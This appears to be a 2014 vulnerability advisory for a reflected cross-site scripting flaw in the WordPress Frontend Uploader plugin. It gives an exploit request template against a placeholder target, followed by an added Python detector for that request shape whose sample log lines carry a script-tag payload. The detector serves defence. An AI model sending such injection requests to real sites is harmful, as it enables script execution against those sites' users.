WordPress Frontend Uploader Cross Site Scripting (XSS)

Posted by SECUPENT Research Center on Dec 27

Exploit Title: WordPress Frontend Uploader Cross Site Scripting (XSS)
Software Link: https://wordpress.org/plugins/frontend-uploader/
Author: SECUPENT
Website: www.secupent.com
Email: research{at}secupent{dot}com
Date: 27-12-2014
Version: 0.9.2

Exploit:

http://TARGET/[forntEndUploaderPage]=59&errors[fu-disallowed-mime-type][0][name]=XSS

Example(p0c):…
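
A defender-side check for the request shape in the exploit line above, added here as an example and not part of SECUPENT's advisory or the plugin's code: it scans access-log lines for `errors[...][n][name]` query parameters whose decoded value contains HTML markup characters. The combined log format, the `page_id` parameter standing in for the advisory's page placeholder, and all sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

# Parameter shape from the advisory: errors[fu-disallowed-mime-type][0][name]
ERR_PARAM = re.compile(r"^errors\[[^\]]+\]\[\d+\]\[name\]$")
# Characters that let a reflected value break out of HTML text or attributes
MARKUP = re.compile(r"[<>\"']")
# Request field of a combined-format access log line (assumed log format)
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

# Constructed sample lines, not real traffic; page_id is an assumed stand-in
SAMPLE_LOG = [
    '203.0.113.7 - - [27/Dec/2014:10:00:01 +0000] "GET /?page_id=59&errors[fu-disallowed-mime-type][0][name]=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 5120',
    '203.0.113.7 - - [27/Dec/2014:10:00:05 +0000] "GET /?page_id=59&errors%5Bfu-disallowed-mime-type%5D%5B0%5D%5Bname%5D=%253Cb%253Ex HTTP/1.1" 200 5120',
    '198.51.100.4 - - [27/Dec/2014:10:01:00 +0000] "GET /?page_id=59&errors[fu-disallowed-mime-type][0][name]=photo.exe HTTP/1.1" 200 5090',
]


def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding so double-encoded markup is still seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_params(log_line):
    """Return [(param, decoded_value)] for errors[...][n][name] values with markup."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    query = m.group(1).partition("?")[2]
    hits = []
    # parse_qsl percent-decodes keys and values once, so encoded brackets match too
    for key, value in parse_qsl(query, keep_blank_values=True):
        if ERR_PARAM.match(key):
            decoded = fully_decode(value)
            if MARKUP.search(decoded):
                hits.append((key, decoded))
    return hits


if __name__ == "__main__":
    for line in SAMPLE_LOG:
        for param, value in suspicious_params(line):
            print(f"markup in {param}: {value!r}")
```

A plain file name in the parameter, as in the third sample line, is what the plugin's own error redirect would normally carry and is not flagged.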
